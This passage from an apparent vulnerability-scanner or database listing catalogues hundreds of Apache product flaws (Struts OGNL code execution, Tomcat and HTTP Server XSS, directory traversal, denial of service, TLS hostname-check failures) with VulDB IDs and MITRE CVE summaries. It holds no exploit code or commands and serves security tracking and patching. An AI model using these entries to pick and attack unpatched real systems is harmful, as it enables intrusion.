5311| [6090] Apache HTTP Server 2.4.0/2.4.1/2.4.2 mod_proxy_http.c information disclosure
5312| [61507] Apache POI up to 3.8 UnhandledDataStructure denial of service
5313| [6070] Apache Struts up to 2.3.4 Token Name Configuration Parameter privilege escalation
5314| [6069] Apache Struts up to 2.3.4 Request Parameter OGNL Expression denial of service
5315| [5764] Oracle Solaris 10 Apache HTTP Server information disclosure
5316| [5700] Oracle Secure Backup 10.3.0.3/10.4.0.1 Apache denial of service
5317| [61255] Apache Hadoop 2.0.0 Kerberos unknown vulnerability
5318| [61229] Apache Sling up to 2.1.1 denial of service
5319| [61152] Apache Commons-compress 1.0/1.1/1.2/1.3/1.4 denial of service
5320| [61094] Apache Roller up to 5.0 cross site scripting
5321| [61093] Apache Roller up to 5.0 cross site request forgery
5322| [61005] Apache OpenOffice 3.3/3.4 unknown vulnerability
5323| [9673] Apache HTTP Server up to 2.4.4 mod_dav mod_dav.c Request denial of service
5324| [5436] Apache OpenOffice 3.3/3.4 WPXContentListener.cpp _closeTableRow() File memory corruption
5325| [5435] Apache OpenOffice 3.3/3.4 vclmi.dll File memory corruption
5326| [60730] PHP 5.4.0/5.4.1/5.4.2 apache_request_headers memory corruption
5327| [60708] Apache Qpid 0.12 unknown vulnerability
5328| [5032] Apache Hadoop up to 0.20.205.0/1.0.1/0.23.1 Kerberos/MapReduce Security Feature privilege escalation
5329| [4949] Apache Struts File Upload XSLTResult.java XSLT File privilege escalation
5330| [4955] Apache Traffic Server 3.0.3/3.1.2 HTTP Header Parser memory corruption
5331| [4882] Apache Wicket up to 1.5.4 directory traversal
5332| [4881] Apache Wicket up to 1.4.19 cross site scripting
5333| [4884] Apache HTTP Server up to 2.3.6 mod_fcgid fcgid_spawn_ctl.c FcgidMaxProcessesPerClass HTTP Requests denial of service
5334| [60352] Apache Struts up to 2.2.3 memory corruption
5335| [60153] Apache Portable Runtime up to 1.4.3 denial of service
5336| [4598] Apache Struts 1.3.10 upload-submit.do cross site scripting
5337| [4597] Apache Struts 1.3.10 processSimple.do cross site scripting
5338| [4596] Apache Struts 2.0.14/2.2.3 struts2-rest-showcase/orders cross site scripting
5339| [4595] Apache Struts 2.0.14/2.2.3 struts2-showcase/person/editPerson.action cross site scripting
5340| [4583] Apache HTTP Server up to 2.2.21 Threaded MPM denial of service
5341| [4582] Apache HTTP Server up to 2.2.21 protocol.c information disclosure
5342| [4571] Apache Struts up to 2.3.1.2 privilege escalation
5343| [4557] Apache Tomcat up to 7.0.21 Caching/Recycling information disclosure
5344| [59934] Apache Tomcat up to 6.0.9 DigestAuthenticator.java unknown vulnerability
5345| [59933] Apache Tomcat up to 6.0.9 Access Restriction unknown vulnerability
5346| [59932] Apache Tomcat up to 6.0.9 unknown vulnerability
5347| [59931] Apache Tomcat up to 6.0.9 Access Restriction information disclosure
5348| [59902] Apache Struts up to 2.2.3 Interfaces unknown vulnerability
5349| [4528] Apache Struts up to 2.2.3 DebuggingInterceptor privilege escalation
5350| [4527] Apache Struts up to 2.2.3 ExceptionDelegator cross site scripting
5351| [59888] Apache Tomcat up to 6.0.6 denial of service
5352| [59886] Apache ActiveMQ up to 5.5.1 Crash denial of service
5353| [4513] Apache Struts up to 2.3.1 ParameterInterceptor directory traversal
5354| [4512] Apache Struts up to 2.2.3 CookieInterceptor command injection
5355| [59850] Apache Geronimo up to 2.2.1 denial of service
5356| [59825] Apache HTTP Server up to 2.1.7 mod_reqtimeout denial of service
5357| [59556] Apache HTTP Server up to 2.0.53 mod_proxy information disclosure
5358| [58467] Apache libcloud 0.2.0/0.3.0/0.3.1/0.4.0 Access Restriction spoofing
5359| [58413] Apache Tomcat up to 6.0.10 spoofing
5360| [58381] Apache Wicket up to 1.4.17 cross site scripting
5361| [58296] Apache Tomcat up to 7.0.19 unknown vulnerability
5362| [57888] Apache HttpClient 4.0/4.0.1/4.1 Authorization information disclosure
5363| [57587] Apache Subversion up to 1.6.16 mod_dav_svn information disclosure
5364| [57585] Apache Subversion up to 1.6.16 mod_dav_svn Memory Consumption denial of service
5365| [57584] Apache Subversion up to 1.6.4 mod_dav_svn NULL Pointer Dereference denial of service
5366| [57577] Apache Rampart-C 1.3.0 Access Restriction rampart_timestamp_token_validate privilege escalation
5367| [57568] Apache Archiva up to 1.3.4 cross site scripting
5368| [57567] Apache Archiva up to 1.3.4 cross site request forgery
5369| [57481] Apache Tomcat 7.0.12/7.0.13 Access Restriction unknown vulnerability
5370| [4355] Apache HTTP Server APR apr_fnmatch denial of service
5371| [57435] Apache Struts up to 2.2.1.1 FileHandler.java cross site scripting
5372| [57425] Apache Struts up to 2.2.1.1 cross site scripting
5373| [4352] Apache HTTP Server 2.2.x APR apr_fnmatch denial of service
5374| [57025] Apache Tomcat up to 7.0.11 information disclosure
5375| [57024] Apache Tomcat 7.0.11 Access Restriction information disclosure
5376| [56774] IBM WebSphere Application Server up to 7.0.0.14 org.apache.jasper.runtime.JspWriterImpl.response denial of service
5377| [56824] Apache Subversion up to 1.6.4 mod_dav_svn NULL Pointer Dereference denial of service
5378| [56832] Apache Tomcat up to 7.0.10 Access Restriction information disclosure
5379| [56830] Apache Tomcat up to 7.0.9 Access Restriction privilege escalation
5380| [12440] Apache Tomcat 6.0.33 Malicious Request cross site scripting
5381| [56512] Apache Continuum up to 1.4.0 cross site scripting
5382| [4285] Apache Tomcat 5.x JVM getLocale() denial of service
5383| [4284] Apache Tomcat 5.x HTML Manager cross site scripting
5384| [4283] Apache Tomcat 5.x ServletContect privilege escalation
5385| [56441] Apache Tomcat up to 7.0.6 denial of service
5386| [56300] Apache CouchDB up to 1.0.1 Web Administration Interface cross site scripting
5387| [55967] Apache Subversion up to 1.6.4 rev_hunt.c denial of service
5388| [55966] Apache Subversion up to 1.6.4 mod_dav_svn repos.c walk denial of service
5389| [55095] Apache Axis2 up to 1.6 Default Password memory corruption
5390| [55631] Apache Archiva up to 1.3.1 User Account cross site request forgery
5391| [55556] Apache Tomcat up to 6.0.29 Default Configuration information disclosure
5392| [55553] Apache Tomcat up to 7.0.4 sessionsList.jsp cross site scripting
5393| [55162] Apache MyFaces up to 2.0.0 Authentication Code unknown vulnerability
5394| [54881] Apache Subversion up to 1.6.12 mod_dav_svn authz.c privilege escalation
5395| [54879] Apache APR-util up to 0.9.14 mod_reqtimeout apr_brigade_split_line denial of service
5396| [54693] Apache Traffic Server DNS Cache unknown vulnerability
5397| [54416] Apache CouchDB up to 0.11.0 cross site request forgery
5398| [54394] Apache CXF up to 2.2.8 Memory Consumption denial of service
5399| [54261] Apache Tomcat jsp/cal/cal2.jsp cross site scripting
5400| [54166] Apache HTTP Server up to 2.2.12 mod_cache Crash denial of service
5401| [54385] Apache Struts up to 2.1.8.1 ParameterInterceptor unknown vulnerability
5402| [54012] Apache Tomcat up to 6.0.10 denial of service
5403| [53763] Apache Axis2 1.3/1.4/1.4.1/1.5/1.5.1 Memory Consumption denial of service
5404| [53368] Apache MyFaces 1.1.7/1.2.8 cross site scripting
5405| [53397] Apache axis2 1.4.1/1.5.1 Administration Console cross site scripting
5406| [52894] Apache Tomcat up to 6.0.7 information disclosure
5407| [52960] Apache ActiveMQ up to 5.4-snapshot information disclosure
5408| [52843] Apache HTTP Server mod_auth_shadow unknown vulnerability
5409| [52786] Apache Open For Business Project up to 09.04 cross site scripting
5410| [52587] Apache ActiveMQ up to 5.3.0 cross site request forgery
5411| [52586] Apache ActiveMQ up to 5.3.0 cross site scripting
5412| [52584] Apache CouchDB up to 0.10.1 information disclosure
5413| [51757] Apache HTTP Server 2.0.44 cross site scripting
5414| [51756] Apache HTTP Server 2.0.44 spoofing
5415| [51717] Apache HTTP Server up to 1.3.3 mod_proxy ap_proxy_send_fb memory corruption
5416| [51690] Apache Tomcat up to 6.0 directory traversal
5417| [51689] Apache Tomcat up to 6.0 information disclosure
5418| [51688] Apache Tomcat up to 6.0 directory traversal
5419| [50886] HP Operations Manager 8.10 on Windows File Upload org.apache.catalina.manager.HTMLManagerServlet memory corruption
5420| [50802] Apache Tomcat up to 3.3 Default Password weak authentication
5421| [50626] Apache Solr 1.0.0 cross site scripting
5422| [49857] Apache HTTP Server mod_proxy_ftp cross site scripting
5423| [49856] Apache HTTP Server 2.2.13 mod_proxy_ftp ap_proxy_ftp_handler denial of service
5424| [49348] Apache Xerces-C++ 2.7.0 Stack-Based denial of service
5425| [86789] Apache Portable Runtime memory/unix/apr_pools.c unknown vulnerability
5426| [49283] Apache APR-util up to 1.3.8 apr-util misc/apr_rmm.c apr_rmm_realloc memory corruption
5427| [48952] Apache HTTP Server up to 1.3.6 mod_deflate denial of service
5428| [48626] Apache Tomcat up to 4.1.23 Access Restriction directory traversal
5429| [48431] Apache Tomcat up to 4.1.23 j_security_check cross site scripting
5430| [48430] Apache Tomcat up to 4.1.23 mod_jk denial of service
5431| [47801] Apache Geronimo 2.1/2.1.1/2.1.2/2.1.3 Administration Console cross site request forgery
5432| [47800] Apache Geronimo 2.1/2.1.1/2.1.2/2.1.3 Administration Console cross site scripting
5433| [47799] Apache Geronimo 2.1/2.1.1/2.1.2/2.1.3 Administration Console directory traversal
5434| [47648] Apache Tiles 2.1.0/2.1.1 cross site scripting
5435| [47640] Apache Struts 2.0.11/2.0.6/2.0.8/2.0.9/2.1 cross site scripting
5436| [47638] Apache Tomcat up to 4.1.23 mod_jk information disclosure
5437| [47636] Apache Struts 2.0.9 xip_client.html cross site scripting
5438| [47593] Apache Mod Perl 1 perl-status Apache::Status cross site scripting
5439| [47637] Apache Struts 1.0.2/1.1/1.2.4/1.2.7/1.2.8 cross site scripting
5440| [47239] Apache Struts up to 2.1.2 Beta struts directory traversal
5441| [47214] Apachefriends xampp 1.6.8 spoofing
5442| [47213] Apachefriends xampp 1.6.8 htaccess cross site request forgery
5443| [47162] Apachefriends XAMPP 1.4.4 weak authentication
5444| [47065] Apache Tomcat 4.1.23 cross site scripting
5445| [46834] Apache Tomcat up to 5.5.20 cross site scripting
5446| [46004] Apache Jackrabbit 1.4/1.5.0 search.jsp cross site scripting
5447| [49205] Apache Roller 2.3/3.0/3.1/4.0 Search cross site scripting
5448| [86625] Apache Struts directory traversal
5449| [44461] Apache Tomcat up to 5.5.0 information disclosure
5450| [44389] Apache Xerces-C++ XML Parser Memory Consumption denial of service
5451| [44352] Apache Friends XAMPP 1.6.8 adodb.php cross site scripting
5452| [43663] Apache Tomcat up to 6.0.16 directory traversal
5453| [43612] Apache Friends XAMPP 1.6.7 iart.php cross site scripting
5454| [43556] Apache HTTP Server up to 2.1.8 mod_proxy_ftp proxy_ftp.c cross site scripting
5455| [43516] Apache Tomcat up to 4.1.20 directory traversal
5456| [43509] Apache Tomcat up to 6.0.13 cross site scripting
5457| [42637] Apache Tomcat up to 6.0.16 cross site scripting
5458| [42325] Apache HTTP Server up to 2.1.8 Error Page cross site scripting
5459| [41838] Apache-SSL 1.3.34 1.57 expandcert privilege escalation
5460| [41091] Apache Software Foundation Mod Jk up to 2.0.1 mod_jk2 Stack-based memory corruption
5461| [40924] Apache Tomcat up to 6.0.15 information disclosure
5462| [40923] Apache Tomcat up to 6.0.15 unknown vulnerability
5463| [40922] Apache Tomcat up to 6.0 information disclosure
5464| [40710] Apache HTTP Server up to 2.0.61 mod_negotiation cross site scripting
5465| [40709] Apache HTTP Server up to 2.0.53 mod_negotiation cross site scripting
5466| [40656] Apache Tomcat 5.5.20 information disclosure
5467| [40503] Apache HTTP Server mod_proxy_ftp cross site scripting
5468| [40502] Apache HTTP Server up to 2.2.5 mod_proxy_balancer memory corruption
5469| [40501] Apache HTTP Server 2.2.6 mod_proxy_balancer cross site request forgery
5470| [40398] Apache HTTP Server up to 2.2 mod_proxy_balancer cross site scripting
5471| [40397] Apache HTTP Server up to 2.2 mod_proxy_balancer balancer_handler denial of service
5472| [40234] Apache Tomcat up to 6.0.15 directory traversal
5473| [40221] Apache HTTP Server 2.2.6 information disclosure
5474| [40027] David Castro Apache Authcas 0.4 sql injection
5475| [3495] Apache OpenOffice up to 2.3 Database Document Processor Designfehler
5476| [3489] Apache HTTP Server 2.x HTTP Header cross site scripting
5477| [3414] Apache Tomcat WebDAV Stored Umgehungs-Angriff
5478| [39489] Apache Jakarta Slide up to 2.1 directory traversal
5479| [39540] Apache Geronimo 2.0/2.0.1/2.0.2/2.1 unknown vulnerability
5480| [3310] Apache OpenOffice 1.1.3/2.0.4/2.2.1 TIFF Image Parser Heap-based memory corruption
5481| [38768] Apache HTTP Server up to 2.1.7 mod_autoindex.c cross site scripting
5482| [38952] Apache Geronimo 2.0.1/2.1 unknown vulnerability
5483| [38658] Apache Tomcat 4.1.31 cal2.jsp cross site request forgery
5484| [38524] Apache Geronimo 2.0 unknown vulnerability
5485| [3256] Apache Tomcat up to 6.0.13 cross site scripting
5486| [38331] Apache Tomcat 4.1.24 information disclosure
5487| [38330] Apache Tomcat 4.1.24 information disclosure
5488| [38185] Apache Tomcat 3.3/3.3.1/3.3.1a/3.3.2 Error Message CookieExample cross site scripting
5489| [37967] Apache Tomcat up to 4.1.36 Error Message sendmail.jsp cross site scripting
5490| [37647] Apache Derby 10.1.1.0/10.1.2.1/10.1.3.1 Authorization unknown vulnerability
5491| [37646] Apache Derby 10.1.1.0/10.1.2.1/10.1.3.1 unknown vulnerability
5492| [3141] Apache Tomcat up to 4.1.31 Accept-Language Header cross site scripting
5493| [3133] Apache Tomcat up to 6.0 HTTP cross site scripting
5494| [37292] Apache Tomcat up to 5.5.1 cross site scripting
5495| [3130] Apache OpenOffice 2.2.1 RTF Document Heap-based memory corruption
5496| [36981] Apache Tomcat JK Web Server Connector up to 1.2.22 mod_jk directory traversal
5497| [36892] Apache Tomcat up to 4.0.0 hello.jsp cross site scripting
5498| [37320] Apache MyFaces Tomahawk up to 1.1.4 cross site scripting
5499| [36697] Apache Tomcat up to 5.5.17 implicit-objects.jsp cross site scripting
5500| [36491] Apache Axis 1.0 Installation javaioFileNotFoundException information disclosure
5501| [36400] Apache Tomcat 5.5.15 mod_jk cross site scripting
5502| [36698] Apache Tomcat up to 4.0.0 cal2.jsp cross site scripting
5503| [36224] XAMPP Apache Distribution up to 1.6.0a adodb.php connect memory corruption
5504| [36225] XAMPP Apache Distribution 1.6.0a sql injection
5505| [2997] Apache httpd/Tomcat 5.5/6.0 directory traversal
5506| [35896] Apache Apache Test up to 1.29 mod_perl denial of service
5507| [35653] Avaya S8300 Cm 3.1.2 Apache Tomcat unknown vulnerability
5508| [35402] Apache Tomcat JK Web Server Connector 1.2.19 mod_jk.so map_uri_to_worker memory corruption
5509| [35067] Apache Stats up to 0.0.2 extract unknown vulnerability
5510| [35025] Apache Stats up to 0.0.3 extract unknown vulnerability
5511| [34252] Apache HTTP Server denial of service
5512| [2795] Apache OpenOffice 2.0.4 WMF/EMF File Heap-based memory corruption
5513| [33877] Apache Opentaps 0.9.3 cross site scripting
5514| [33876] Apache Open For Business Project unknown vulnerability
5515| [33875] Apache Open For Business Project cross site scripting
5516| [2703] Apache Jakarta Tomcat up to 5.x der_get_oid() memory corruption
5517| [2611] Apache HTTP Server up to 1.0.1 set_var Format String
5518| [31827] XMB Extreme Message Board up to 1.9.6 Apache HTTP Server memcp.php directory traversal
5519| [2452] Apache HTTP Server up to 2.2.3 on Windows mod_alias unknown vulnerability
5520| [31663] vbPortal Apache HTTP Server index.php directory traversal
5521| [2414] Apache HTTP Server up to 2.2.3 mod_rewrite memory corruption
5522| [2393] Apache HTTP Server up to 2.2.2 HTTP Header cross site scripting
5523| [30623] Apache James 2.2.0 SMTP Server denial of service
5524| [30176] PHP-Fusion up to 6.00.306 Apache HTTP Server .php.gif privilege escalation
5525|
5526| MITRE CVE - https://cve.mitre.org:
5527| [CVE-2013-4156] Apache OpenOffice.org (OOo) before 4.0 allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via a crafted element in an OOXML document file.
5528| [CVE-2013-4131] The mod_dav_svn Apache HTTPD server module in Subversion 1.7.0 through 1.7.10 and 1.8.x before 1.8.1 allows remote authenticated users to cause a denial of service (assertion failure or out-of-bounds read) via a certain (1) COPY, (2) DELETE, or (3) MOVE request against a revision root.
5529| [CVE-2013-3239] phpMyAdmin 3.5.x before 3.5.8 and 4.x before 4.0.0-rc3, when a SaveDir directory is configured, allows remote authenticated users to execute arbitrary code by using a double extension in the filename of an export file, leading to interpretation of this file as an executable file by the Apache HTTP Server, as demonstrated by a .php.sql filename.
5530| [CVE-2013-3060] The web console in Apache ActiveMQ before 5.8.0 does not require authentication, which allows remote attackers to obtain sensitive information or cause a denial of service via HTTP requests.
5531| [CVE-2013-2765] The ModSecurity module before 2.7.4 for the Apache HTTP Server allows remote attackers to cause a denial of service (NULL pointer dereference, process crash, and disk consumption) via a POST request with a large body and a crafted Content-Type header.
5532| [CVE-2013-2251] Apache Struts 2.0.0 through 2.3.15 allows remote attackers to execute arbitrary OGNL expressions via a parameter with a crafted (1) action:, (2) redirect:, or (3) redirectAction: prefix.
5533| [CVE-2013-2249] mod_session_dbd.c in the mod_session_dbd module in the Apache HTTP Server before 2.4.5 proceeds with save operations for a session without considering the dirty flag and the requirement for a new session ID, which has unspecified impact and remote attack vectors.
5534| [CVE-2013-2248] Multiple open redirect vulnerabilities in Apache Struts 2.0.0 through 2.3.15 allow remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in a parameter using the (1) redirect: or (2) redirectAction: prefix.
5535| [CVE-2013-2189] Apache OpenOffice.org (OOo) before 4.0 allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via invalid PLCF data in a DOC document file.
5536| [CVE-2013-2135] Apache Struts 2 before 2.3.14.3 allows remote attackers to execute arbitrary OGNL code via a request with a crafted value that contains both "${}" and "%{}" sequences, which causes the OGNL code to be evaluated twice.
5537| [CVE-2013-2134] Apache Struts 2 before 2.3.14.3 allows remote attackers to execute arbitrary OGNL code via a request with a crafted action name that is not properly handled during wildcard matching, a different vulnerability than CVE-2013-2135.
5538| [CVE-2013-2115] Apache Struts 2 before 2.3.14.2 allows remote attackers to execute arbitrary OGNL code via a crafted request that is not properly handled when using the includeParams attribute in the (1) URL or (2) A tag. NOTE: this issue is due to an incomplete fix for CVE-2013-1966.
5539| [CVE-2013-2071] java/org/apache/catalina/core/AsyncContextImpl.java in Apache Tomcat 7.x before 7.0.40 does not properly handle the throwing of a RuntimeException in an AsyncListener in an application, which allows context-dependent attackers to obtain sensitive request information intended for other applications in opportunistic circumstances via an application that records the requests that it processes.
5540| [CVE-2013-2067] java/org/apache/catalina/authenticator/FormAuthenticator.java in the form authentication feature in Apache Tomcat 6.0.21 through 6.0.36 and 7.x before 7.0.33 does not properly handle the relationships between authentication requirements and sessions, which allows remote attackers to inject a request into a session by sending this request during completion of the login form, a variant of a session fixation attack.
5541| [CVE-2013-1966] Apache Struts 2 before 2.3.14.1 allows remote attackers to execute arbitrary OGNL code via a crafted request that is not properly handled when using the includeParams attribute in the (1) URL or (2) A tag.
5542| [CVE-2013-1965] Apache Struts Showcase App 2.0.0 through 2.3.13, as used in Struts 2 before 2.3.14.1, allows remote attackers to execute arbitrary OGNL code via a crafted parameter name that is not properly handled when invoking a redirect.
5543| [CVE-2013-1896] mod_dav.c in the Apache HTTP Server before 2.2.25 does not properly determine whether DAV is enabled for a URI, which allows remote attackers to cause a denial of service (segmentation fault) via a MERGE request in which the URI is configured for handling by the mod_dav_svn module, but a certain href attribute in XML data refers to a non-DAV URI.
5544| [CVE-2013-1884] The mod_dav_svn Apache HTTPD server module in Subversion 1.7.0 through 1.7.8 allows remote attackers to cause a denial of service (segmentation fault and crash) via a log REPORT request with an invalid limit, which triggers an access of an uninitialized variable.
5545| [CVE-2013-1879] Cross-site scripting (XSS) vulnerability in scheduled.jsp in Apache ActiveMQ 5.8.0 and earlier allows remote attackers to inject arbitrary web script or HTML via vectors involving the "cron of a message."
5546| [CVE-2013-1862] mod_rewrite.c in the mod_rewrite module in the Apache HTTP Server 2.2.x before 2.2.25 writes data to a log file without sanitizing non-printable characters, which might allow remote attackers to execute arbitrary commands via an HTTP request containing an escape sequence for a terminal emulator.
5547| [CVE-2013-1849] The mod_dav_svn Apache HTTPD server module in Subversion 1.6.x through 1.6.20 and 1.7.0 through 1.7.8 allows remote attackers to cause a denial of service (NULL pointer dereference and crash) via a PROPFIND request for an activity URL.
5548| [CVE-2013-1847] The mod_dav_svn Apache HTTPD server module in Subversion 1.6.0 through 1.6.20 and 1.7.0 through 1.7.8 allows remote attackers to cause a denial of service (NULL pointer dereference and crash) via an anonymous LOCK for a URL that does not exist.
5549| [CVE-2013-1846] The mod_dav_svn Apache HTTPD server module in Subversion 1.6.x before 1.6.21 and 1.7.0 through 1.7.8 allows remote authenticated users to cause a denial of service (NULL pointer dereference and crash) via a LOCK on an activity URL.
5550| [CVE-2013-1845] The mod_dav_svn Apache HTTPD server module in Subversion 1.6.x before 1.6.21 and 1.7.0 through 1.7.8 allows remote authenticated users to cause a denial of service (memory consumption) by (1) setting or (2) deleting a large number of properties for a file or directory.
5551| [CVE-2013-1814] The users/get program in the User RPC API in Apache Rave 0.11 through 0.20 allows remote authenticated users to obtain sensitive information about all user accounts via the offset parameter, as demonstrated by discovering password hashes in the password field of a response.
5552| [CVE-2013-1777] The JMX Remoting functionality in Apache Geronimo 3.x before 3.0.1, as used in IBM WebSphere Application Server (WAS) Community Edition 3.0.0.3 and other products, does not property implement the RMI classloader, which allows remote attackers to execute arbitrary code by using the JMX connector to send a crafted serialized object.
5553| [CVE-2013-1768] The BrokerFactory functionality in Apache OpenJPA 1.x before 1.2.3 and 2.x before 2.2.2 creates local executable JSP files containing logging trace data produced during deserialization of certain crafted OpenJPA objects, which makes it easier for remote attackers to execute arbitrary code by creating a serialized object and leveraging improperly secured server programs.
5554| [CVE-2013-1088] Cross-site request forgery (CSRF) vulnerability in Novell iManager 2.7 before SP6 Patch 1 allows remote attackers to hijack the authentication of arbitrary users by leveraging improper request validation by iManager code deployed within an Apache Tomcat container.
5555| [CVE-2013-1048] The Debian apache2ctl script in the apache2 package squeeze before 2.2.16-6+squeeze11, wheezy before 2.2.22-13, and sid before 2.2.22-13 for the Apache HTTP Server on Debian GNU/Linux does not properly create the /var/lock/apache2 lock directory, which allows local users to gain privileges via an unspecified symlink attack.
5556| [CVE-2013-0966] The Apple mod_hfs_apple module for the Apache HTTP Server in Apple Mac OS X before 10.8.3 does not properly handle ignorable Unicode characters, which allows remote attackers to bypass intended directory authentication requirements via a crafted pathname in a URI.
5557| [CVE-2013-0942] Cross-site scripting (XSS) vulnerability in EMC RSA Authentication Agent 7.1 before 7.1.1 for Web for Internet Information Services, and 7.1 before 7.1.1 for Web for Apache, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
5558| [CVE-2013-0941] EMC RSA Authentication API before 8.1 SP1, RSA Web Agent before 5.3.5 for Apache Web Server, RSA Web Agent before 5.3.5 for IIS, RSA PAM Agent before 7.0, and RSA Agent before 6.1.4 for Microsoft Windows use an improper encryption algorithm and a weak key for maintaining the stored data of the node secret for the SecurID Authentication API, which allows local users to obtain sensitive information via cryptographic attacks on this data.
5559| [CVE-2013-0253] The default configuration of Apache Maven 3.0.4, when using Maven Wagon 2.1, disables SSL certificate checks, which allows remote attackers to spoof servers via a man-in-the-middle (MITM) attack.
5560| [CVE-2013-0248] The default configuration of javax.servlet.context.tempdir in Apache Commons FileUpload 1.0 through 1.2.2 uses the /tmp directory for uploaded files, which allows local users to overwrite arbitrary files via an unspecified symlink attack.
5561| [CVE-2013-0239] Apache CXF before 2.5.9, 2.6.x before 2.6.6, and 2.7.x before 2.7.3, when the plaintext UsernameToken WS-SecurityPolicy is enabled, allows remote attackers to bypass authentication via a security header of a SOAP request containing a UsernameToken element that lacks a password child element.
5562| [CVE-2012-6573] Cross-site scripting (XSS) vulnerability in the Apache Solr Autocomplete module 6.x-1.x before 6.x-1.4 and 7.x-1.x before 7.x-1.3 for Drupal allows remote attackers to inject arbitrary web script or HTML via vectors involving autocomplete results.
5563| [CVE-2012-6551] The default configuration of Apache ActiveMQ before 5.8.0 enables a sample web application, which allows remote attackers to cause a denial of service (broker resource consumption) via HTTP requests.
5564| [CVE-2012-6092] Multiple cross-site scripting (XSS) vulnerabilities in the web demos in Apache ActiveMQ before 5.8.0 allow remote attackers to inject arbitrary web script or HTML via (1) the refresh parameter to PortfolioPublishServlet.java (aka demo/portfolioPublish or Market Data Publisher), or vectors involving (2) debug logs or (3) subscribe messages in webapp/websocket/chat.js. NOTE: AMQ-4124 is covered by CVE-2012-6551.
5565| [CVE-2012-5887] The HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.36, 6.x before 6.0.36, and 7.x before 7.0.30 does not properly check for stale nonce values in conjunction with enforcement of proper credentials, which makes it easier for remote attackers to bypass intended access restrictions by sniffing the network for valid requests.
5566| [CVE-2012-5886] The HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.36, 6.x before 6.0.36, and 7.x before 7.0.30 caches information about the authenticated user within the session state, which makes it easier for remote attackers to bypass authentication via vectors related to the session ID.
5567| [CVE-2012-5885] The replay-countermeasure functionality in the HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.36, 6.x before 6.0.36, and 7.x before 7.0.30 tracks cnonce (aka client nonce) values instead of nonce (aka server nonce) and nc (aka nonce-count) values, which makes it easier for remote attackers to bypass intended access restrictions by sniffing the network for valid requests, a different vulnerability than CVE-2011-1184.
5568| [CVE-2012-5786] The wsdl_first_https sample code in distribution/src/main/release/samples/wsdl_first_https/src/main/ in Apache CXF, possibly 2.6.0, does not verify that the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via an arbitrary valid certificate.
5569| [CVE-2012-5785] Apache Axis2/Java 1.6.2 and earlier does not verify that the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via an arbitrary valid certificate.
5570| [CVE-2012-5784] Apache Axis 1.4 and earlier, as used in PayPal Payments Pro, PayPal Mass Pay, PayPal Transactional Information SOAP, the Java Message Service implementation in Apache ActiveMQ, and other products, does not verify that the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via an arbitrary valid certificate.
5571| [CVE-2012-5783] Apache Commons HttpClient 3.x, as used in Amazon Flexible Payments Service (FPS) merchant Java SDK and other products, does not verify that the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via an arbitrary valid certificate.
5572| [CVE-2012-5633] The URIMappingInterceptor in Apache CXF before 2.5.8, 2.6.x before 2.6.5, and 2.7.x before 2.7.2, when using the WSS4JInInterceptor, bypasses WS-Security processing, which allows remote attackers to obtain access to SOAP services via an HTTP GET request.
5573| [CVE-2012-5616] Apache CloudStack 4.0.0-incubating and Citrix CloudPlatform (formerly Citrix CloudStack) before 3.0.6 stores sensitive information in the log4j.conf log file, which allows local users to obtain (1) the SSH private key as recorded by the createSSHKeyPair API, (2) the password of an added host as recorded by the AddHost API, or the password of an added VM as recorded by the (3) DeployVM or (4) ResetPasswordForVM API.
5574| [CVE-2012-5568] Apache Tomcat through 7.0.x allows remote attackers to cause a denial of service (daemon outage) via partial HTTP requests, as demonstrated by Slowloris.
5575| [CVE-2012-5351] Apache Axis2 allows remote attackers to forge messages and bypass authentication via a SAML assertion that lacks a Signature element, aka a "Signature exclusion attack," a different vulnerability than CVE-2012-4418.
5576| [CVE-2012-4558] Multiple cross-site scripting (XSS) vulnerabilities in the balancer_handler function in the manager interface in mod_proxy_balancer.c in the mod_proxy_balancer module in the Apache HTTP Server 2.2.x before 2.2.24-dev and 2.4.x before 2.4.4 allow remote attackers to inject arbitrary web script or HTML via a crafted string.
5577| [CVE-2012-4557] The mod_proxy_ajp module in the Apache HTTP Server 2.2.12 through 2.2.21 places a worker node into an error state upon detection of a long request-processing time, which allows remote attackers to cause a denial of service (worker consumption) via an expensive request.
5578| [CVE-2012-4556] The token processing system (pki-tps) in Red Hat Certificate System (RHCS) before 8.1.3 allows remote attackers to cause a denial of service (Apache httpd web server child process restart) via certain unspecified empty search fields in a user certificate search query.
5579| [CVE-2012-4555] The token processing system (pki-tps) in Red Hat Certificate System (RHCS) before 8.1.3 does not properly handle interruptions of token format operations, which allows remote attackers to cause a denial of service (NULL pointer dereference and Apache httpd web server child process crash) via unspecified vectors.
5580| [CVE-2012-4534] org/apache/tomcat/util/net/NioEndpoint.java in Apache Tomcat 6.x before 6.0.36 and 7.x before 7.0.28, when the NIO connector is used in conjunction with sendfile and HTTPS, allows remote attackers to cause a denial of service (infinite loop) by terminating the connection during the reading of a response.
5581| [CVE-2012-4528] The mod_security2 module before 2.7.0 for the Apache HTTP Server allows remote attackers to bypass rules, and deliver arbitrary POST data to a PHP application, via a multipart request in which an invalid part precedes the crafted data.
5582| [CVE-2012-4501] Citrix Cloud.com CloudStack, and Apache CloudStack pre-release, allows remote attackers to make arbitrary API calls by leveraging the system user account, as demonstrated by API calls to delete VMs.
5583| [CVE-2012-4460] The serializing/deserializing functions in the qpid::framing::Buffer class in Apache Qpid 0.20 and earlier allow remote attackers to cause a denial of service (assertion failure and daemon exit) via unspecified vectors. NOTE: this issue could also trigger an out-of-bounds read, but it might not trigger a crash.
5584| [CVE-2012-4459] Integer overflow in the qpid::framing::Buffer::checkAvailable function in Apache Qpid 0.20 and earlier allows remote attackers to cause a denial of service (crash) via a crafted message, which triggers an out-of-bounds read.
